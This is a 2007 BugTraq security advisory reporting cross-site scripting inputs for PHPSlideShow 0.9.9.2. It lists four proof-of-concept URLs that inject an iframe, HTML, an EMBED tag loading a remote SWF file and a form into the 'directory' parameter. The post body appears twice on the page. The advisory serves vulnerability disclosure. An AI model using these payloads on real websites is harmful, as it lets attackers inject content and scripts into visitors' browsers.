BugTraq
Back to list
|
Post reply
PHPSlideShow XSS Update
Nov 27 2007 09:16PM
morin josh gmail com
Vendor Site: http://www.zinkwazi.com/wp/scripts/
Version affected: 0.9.9.2
URL:http://www.example.com/scripts/demo/phpslideshow.php?directory=photo
s
BID ref: 26576 By Jose Luis Góngora Fernández
PHPSlideShow is also susceptible the following inputs:
1.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory="><ifr
ame>
2.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<html>
<font color="Red"><b>Pwned</b></font></html>
3.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<EMBED
SRC="http://site.com/xss.swf"
4.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=FORM%2
0ACTION=%22search.php%22%20METHOD=%22GET%22%3E
Discovered by: Joshua Morin
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Version affected: 0.9.9.2
URL:http://www.example.com/scripts/demo/phpslideshow.php?directory=photo
s
BID ref: 26576 By Jose Luis Góngora Fernández
PHPSlideShow is also susceptible the following inputs:
1.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory="><ifr
ame>
2.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<html>
<font color="Red"><b>Pwned</b></font></html>
3.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<EMBED
SRC="http://site.com/xss.swf"
4.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=FORM%2
0ACTION=%22search.php%22%20METHOD=%22GET%22%3E
Discovered by: Joshua Morin
[ reply ]